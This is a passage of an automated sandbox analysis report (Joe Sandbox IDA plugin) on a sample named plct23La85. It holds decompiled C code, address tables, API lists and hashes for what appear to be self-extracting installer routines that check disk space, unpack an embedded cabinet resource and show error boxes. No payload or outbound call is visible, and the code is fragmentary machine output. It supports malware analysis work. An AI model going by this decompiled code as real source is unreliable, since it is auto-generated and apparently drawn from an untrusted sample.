                                                                                                                                                                                                    							_t110 =  *((intOrPtr*)(0x1389e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1389e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                    							_t103 = (_t105 >> 2) +  *0x139a38;
                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t110 = 0x4c5;
                                                                                                                                                                                                    						E001344B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						goto L31;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                    					 *0x139124 = E00136285();
                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                    					_t110 = 0x4f9;
                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t110 = 0x4bc;
                                                                                                                                                                                                    					E001344B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0x139124 = E00136285();
                                                                                                                                                                                                    					_t66 = 0;
                                                                                                                                                                                                    					L33:
                                                                                                                                                                                                    					return E00136CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}



































                                                                                                                                                                                                    0x0013597d
                                                                                                                                                                                                    0x00135988
                                                                                                                                                                                                    0x0013598f
                                                                                                                                                                                                    0x0013599a
                                                                                                                                                                                                    0x001359a6
                                                                                                                                                                                                    0x001359a8
                                                                                                                                                                                                    0x001359af
                                                                                                                                                                                                    0x001359b9
                                                                                                                                                                                                    0x001359dd
                                                                                                                                                                                                    0x001359e4
                                                                                                                                                                                                    0x001359f1
                                                                                                                                                                                                    0x001359fe
                                                                                                                                                                                                    0x00135a0b
                                                                                                                                                                                                    0x00135a13
                                                                                                                                                                                                    0x00135a19
                                                                                                                                                                                                    0x00135a1b
                                                                                                                                                                                                    0x00135ba1
                                                                                                                                                                                                    0x00135baf
                                                                                                                                                                                                    0x00135bbd
                                                                                                                                                                                                    0x00135bd8
                                                                                                                                                                                                    0x00135bde
                                                                                                                                                                                                    0x00135be3
                                                                                                                                                                                                    0x00135bec
                                                                                                                                                                                                    0x00135bf0
                                                                                                                                                                                                    0x00135bfc
                                                                                                                                                                                                    0x00135c02
                                                                                                                                                                                                    0x00135c02
                                                                                                                                                                                                    0x00135c02
                                                                                                                                                                                                    0x00135c04
                                                                                                                                                                                                    0x00135c04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135c04
                                                                                                                                                                                                    0x00135a27
                                                                                                                                                                                                    0x00135a3a
                                                                                                                                                                                                    0x00135a46
                                                                                                                                                                                                    0x00135a48
                                                                                                                                                                                                    0x00135a4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135a64
                                                                                                                                                                                                    0x00135a6a
                                                                                                                                                                                                    0x00135a6c
                                                                                                                                                                                                    0x00135abc
                                                                                                                                                                                                    0x00135ac2
                                                                                                                                                                                                    0x00135ac9
                                                                                                                                                                                                    0x00135aca
                                                                                                                                                                                                    0x00135aca
                                                                                                                                                                                                    0x00135acc
                                                                                                                                                                                                    0x00135acc
                                                                                                                                                                                                    0x00135acf
                                                                                                                                                                                                    0x00135ad1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135ad3
                                                                                                                                                                                                    0x00135ad6
                                                                                                                                                                                                    0x00135ad8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135ada
                                                                                                                                                                                                    0x00135adc
                                                                                                                                                                                                    0x00135add
                                                                                                                                                                                                    0x00135add
                                                                                                                                                                                                    0x00135ae0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135ae0
                                                                                                                                                                                                    0x00135ae2
                                                                                                                                                                                                    0x00135ae4
                                                                                                                                                                                                    0x00135ae6
                                                                                                                                                                                                    0x00135ae6
                                                                                                                                                                                                    0x00135ae6
                                                                                                                                                                                                    0x00135ae9
                                                                                                                                                                                                    0x00135aeb
                                                                                                                                                                                                    0x00135af0
                                                                                                                                                                                                    0x00135af6
                                                                                                                                                                                                    0x00135af8
                                                                                                                                                                                                    0x00135af9
                                                                                                                                                                                                    0x00135af9
                                                                                                                                                                                                    0x00135afb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135afd
                                                                                                                                                                                                    0x00135aff
                                                                                                                                                                                                    0x00135b00
                                                                                                                                                                                                    0x00135b03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135b03
                                                                                                                                                                                                    0x00135b05
                                                                                                                                                                                                    0x00135b08
                                                                                                                                                                                                    0x00135b20
                                                                                                                                                                                                    0x00135b27
                                                                                                                                                                                                    0x00135b52
                                                                                                                                                                                                    0x00135b52
                                                                                                                                                                                                    0x00135b5b
                                                                                                                                                                                                    0x00135b62
                                                                                                                                                                                                    0x00135b6b
                                                                                                                                                                                                    0x00135b6d
                                                                                                                                                                                                    0x00135b76
                                                                                                                                                                                                    0x00135b7d
                                                                                                                                                                                                    0x00135b83
                                                                                                                                                                                                    0x00135b7f
                                                                                                                                                                                                    0x00135b7f
                                                                                                                                                                                                    0x00135b7f
                                                                                                                                                                                                    0x00135b6f
                                                                                                                                                                                                    0x00135b72
                                                                                                                                                                                                    0x00135b72
                                                                                                                                                                                                    0x00135b85
                                                                                                                                                                                                    0x00135b98
                                                                                                                                                                                                    0x00135b9e
                                                                                                                                                                                                    0x00135b87
                                                                                                                                                                                                    0x00135b8f
                                                                                                                                                                                                    0x00135b8f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135b85
                                                                                                                                                                                                    0x00135b29
                                                                                                                                                                                                    0x00135b33
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135b35
                                                                                                                                                                                                    0x00135b48
                                                                                                                                                                                                    0x00135b4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135b4a
                                                                                                                                                                                                    0x00135b0f
                                                                                                                                                                                                    0x00135b16
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135b16
                                                                                                                                                                                                    0x00135a7c
                                                                                                                                                                                                    0x00135a8a
                                                                                                                                                                                                    0x00135aa5
                                                                                                                                                                                                    0x00135aab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001359bb
                                                                                                                                                                                                    0x001359c0
                                                                                                                                                                                                    0x001359c7
                                                                                                                                                                                                    0x001359d1
                                                                                                                                                                                                    0x001359d6
                                                                                                                                                                                                    0x00135c05
                                                                                                                                                                                                    0x00135c14
                                                                                                                                                                                                    0x00135c14

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001359A8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 001359AF
                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00135A13
                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00135A40
                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00135A64
                                                                                                                                                                                                    • memset.MSVCRT ref: 00135A7C
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00135A98
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00135AA5
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00135BFC
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                      • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                    • Opcode ID: ec7c6f1b1773a5004b20fccbf376f40ea21fdf590b08b8870d6b016f667c7811
                                                                                                                                                                                                    • Instruction ID: 46ab6cc2fa824e7cd44e664f181afffb17ed8a8cc2c803d00a07e3963e3ee16e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec7c6f1b1773a5004b20fccbf376f40ea21fdf590b08b8870d6b016f667c7811
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E47190B190020CAFEB299F60CC85FFBB7AEEB48744F5441A9F545D7580EB709E858B60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 374 134fe0-13501a call 13468f FindResourceA LoadResource LockResource 377 135161-135163 374->377 378 135020-135027 374->378 379 135057-13505e call 134efd 378->379 380 135029-135051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 135060-135077 call 1344b9 379->383 384 13507c-1350b4 379->384 380->379 388 135107-13510e 383->388 389 1350b6-1350da 384->389 390 1350e8-135104 call 1344b9 384->390 392 135110-135117 FreeResource 388->392 393 13511d-13511f 388->393 398 135106 389->398 402 1350dc 389->402 390->398 392->393 395 135121-135127 393->395 396 13513a-135141 393->396 395->396 399 135129-135135 call 1344b9 395->399 400 135143-13514a 396->400 401 13515f 396->401 398->388 399->396 400->401 404 13514c-135159 SendMessageA 400->404 401->377 405 1350e3-1350e6 402->405 404->401 405->390 405->398
                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                    			E00134FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				struct HWND__* _t9;
                                                                                                                                                                                                    				int _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                    				struct HWND__* _t27;
                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				CHAR* _t36;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __edi;
                                                                                                                                                                                                    				_t36 = "CABINET";
                                                                                                                                                                                                    				 *0x139144 = E0013468F(_t36, 0, 0);
                                                                                                                                                                                                    				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                    				 *0x139140 = _t8;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					return _t8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t9 =  *0x138584; // 0x0
                                                                                                                                                                                                    				if(_t9 != 0) {
                                                                                                                                                                                                    					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                    					ShowWindow(GetDlgItem( *0x138584, 0x841), 5); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t10 = E00134EFD(0, 0); // executed
                                                                                                                                                                                                    				if(_t10 != 0) {
                                                                                                                                                                                                    					__imp__#20(E00134CA0, E00134CC0, E00134980, E00134A50, E00134AD0, E00134B60, E00134BC0, 1, 0x139148, _t33);
                                                                                                                                                                                                    					_t34 = _t10;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						_t29 =  *0x139148; // 0x0
                                                                                                                                                                                                    						_t24 =  *0x138584; // 0x0
                                                                                                                                                                                                    						E001344B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__#22(_t34, "*MEMCAB", 0x131140, 0, E00134CD0, 0, 0x139140); // executed
                                                                                                                                                                                                    					_t37 = _t10;
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__#23(_t34); // executed
                                                                                                                                                                                                    					if(_t10 != 0) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 =  *0x138584; // 0x0
                                                                                                                                                                                                    					E001344B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_t12 =  *0x139140; // 0x0
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						FreeResource(_t12);
                                                                                                                                                                                                    						 *0x139140 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						_t47 =  *0x1391d8; // 0x0
                                                                                                                                                                                                    						if(_t47 == 0) {
                                                                                                                                                                                                    							E001344B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(( *0x138a38 & 0x00000001) == 0 && ( *0x139a34 & 0x00000001) == 0) {
                                                                                                                                                                                                    						SendMessageA( *0x138584, 0xfa1, _t37, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t37;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
















                                                                                                                                                                                                    0x00134fe0
                                                                                                                                                                                                    0x00134fe6
                                                                                                                                                                                                    0x00134ff9
                                                                                                                                                                                                    0x0013500d
                                                                                                                                                                                                    0x00135013
                                                                                                                                                                                                    0x0013501a
                                                                                                                                                                                                    0x00135163
                                                                                                                                                                                                    0x00135163
                                                                                                                                                                                                    0x00135020
                                                                                                                                                                                                    0x00135027
                                                                                                                                                                                                    0x00135037
                                                                                                                                                                                                    0x00135051
                                                                                                                                                                                                    0x00135051
                                                                                                                                                                                                    0x00135057
                                                                                                                                                                                                    0x0013505e
                                                                                                                                                                                                    0x001350a7
                                                                                                                                                                                                    0x001350ad
                                                                                                                                                                                                    0x001350b4
                                                                                                                                                                                                    0x001350e8
                                                                                                                                                                                                    0x001350e8
                                                                                                                                                                                                    0x001350ee
                                                                                                                                                                                                    0x001350ff
                                                                                                                                                                                                    0x00135104
                                                                                                                                                                                                    0x00135106
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135106
                                                                                                                                                                                                    0x001350cd
                                                                                                                                                                                                    0x001350d3
                                                                                                                                                                                                    0x001350da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001350dd
                                                                                                                                                                                                    0x001350e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135060
                                                                                                                                                                                                    0x00135060
                                                                                                                                                                                                    0x00135070
                                                                                                                                                                                                    0x00135075
                                                                                                                                                                                                    0x00135107
                                                                                                                                                                                                    0x00135107
                                                                                                                                                                                                    0x0013510e
                                                                                                                                                                                                    0x00135111
                                                                                                                                                                                                    0x00135117
                                                                                                                                                                                                    0x00135117
                                                                                                                                                                                                    0x0013511f
                                                                                                                                                                                                    0x00135121
                                                                                                                                                                                                    0x00135127
                                                                                                                                                                                                    0x00135135
                                                                                                                                                                                                    0x00135135
                                                                                                                                                                                                    0x00135127
                                                                                                                                                                                                    0x00135141
                                                                                                                                                                                                    0x00135159
                                                                                                                                                                                                    0x00135159
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013515f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00134FFE
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00135006
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0013500D
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00135030
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00135037
                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 0013504A
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00135051
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00135111
                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00135159
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                    • Opcode ID: abf4c8cb0b82ba0bfe77c035a8c8371e055677c585bf2d82fab1cd3056b6fb03
                                                                                                                                                                                                    • Instruction ID: caff2542cde5c304f9f11f99f85fc26eba5d54a1557458d92439e0b04947600a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: abf4c8cb0b82ba0bfe77c035a8c8371e055677c585bf2d82fab1cd3056b6fb03
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE31EAB0780701BFE7205B61AD8AF673A6DBB14B55F040024F946B29A1DBF5DC808A61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 406 1344b9-1344f8 407 134679-13467b 406->407 408 1344fe-134525 LoadStringA 406->408 411 13467c-13468c call 136ce0 407->411 409 134562-134568 408->409 410 134527-13452e call 13681f 408->410 412 13456b-134570 409->412 420 134530-13453d call 1367c9 410->420 421 13453f 410->421 412->412 416 134572-13457c 412->416 418 1345c9-1345cb 416->418 419 13457e-134580 416->419 424 134607-134617 LocalAlloc 418->424 425 1345cd-1345cf 418->425 422 134583-134588 419->422 420->421 426 134544-134554 MessageBoxA 420->426 421->426 422->422 429 13458a-13458c 422->429 427 13455a-13455d 424->427 428 13461d-134628 call 131680 424->428 431 1345d2-1345d7 425->431 426->427 427->411 435 13462d-13463d MessageBeep call 13681f 428->435 433 13458f-134594 429->433 431->431 434 1345d9-1345ed LocalAlloc 431->434 433->433 436 134596-1345ad LocalAlloc 433->436 434->427 437 1345f3-134605 call 13171e 434->437 444 13463f-13464c call 1367c9 435->444 445 13464e 435->445 436->427 440 1345af-1345c7 call 13171e 436->440 437->435 440->435 444->445 448 134653-134677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E001344B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                    				char _v576;
                                                                                                                                                                                                    				void* _v580;
                                                                                                                                                                                                    				struct HWND__* _v584;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                                                                    				_t34 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                    				_v584 = __ecx;
                                                                                                                                                                                                    				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                    				_t67 = _a4;
                                                                                                                                                                                                    				_t69 = 0xd;
                                                                                                                                                                                                    				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                    				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                    				_v580 = _t37;
                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                    				if(( *0x138a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    					_t39 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_v576 = 0;
                                                                                                                                                                                                    					LoadStringA( *0x139a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                                                                                    						_t73 =  &_v576;
                                                                                                                                                                                                    						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                    						_t75 = _t16;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t43 =  *_t73;
                                                                                                                                                                                                    							_t73 = _t73 + 1;
                                                                                                                                                                                                    						} while (_t43 != 0);
                                                                                                                                                                                                    						_t84 = _v580;
                                                                                                                                                                                                    						_t74 = _t73 - _t75;
                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                    								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                    								_t83 = _t27;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t75 = _t83;
                                                                                                                                                                                                    									_t74 = _t80;
                                                                                                                                                                                                    									E00131680(_t80, _t83,  &_v576);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t76 = _t67;
                                                                                                                                                                                                    								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                    								_t85 = _t24;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t55 =  *_t76;
                                                                                                                                                                                                    									_t76 = _t76 + 1;
                                                                                                                                                                                                    								} while (_t55 != 0);
                                                                                                                                                                                                    								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                    								_t83 = _t25 + _t74;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E0013171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t77 = _t67;
                                                                                                                                                                                                    							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                    							_t81 = _t18;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t58 =  *_t77;
                                                                                                                                                                                                    								_t77 = _t77 + 1;
                                                                                                                                                                                                    							} while (_t58 != 0);
                                                                                                                                                                                                    							_t75 = _t77 - _t81;
                                                                                                                                                                                                    							_t82 = _t84 + 1;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t59 =  *_t84;
                                                                                                                                                                                                    								_t84 = _t84 + 1;
                                                                                                                                                                                                    							} while (_t59 != 0);
                                                                                                                                                                                                    							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                    							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                    							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                    							_t80 = _t44;
                                                                                                                                                                                                    							if(_t80 == 0) {
                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_push(_v580);
                                                                                                                                                                                                    								E0013171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                    								MessageBeep(_a12);
                                                                                                                                                                                                    								if(E0013681F(_t67) == 0) {
                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                    									_t49 = 0x10000;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t54 = E001367C9(_t74, _t74);
                                                                                                                                                                                                    									_t49 = 0x190000;
                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t52 = MessageBoxA(_v584, _t80, "nst0dum", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                    								_t83 = _t52;
                                                                                                                                                                                                    								LocalFree(_t80);
                                                                                                                                                                                                    								_t39 = _t52;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(E0013681F(_t67) == 0) {
                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                    							_t64 = 0x10010;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t66 = E001367C9(0, 0);
                                                                                                                                                                                                    							_t64 = 0x190010;
                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t44 = MessageBoxA(_v584,  &_v64, "nst0dum", _t64);
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						_t39 = _t44 | 0xffffffff;
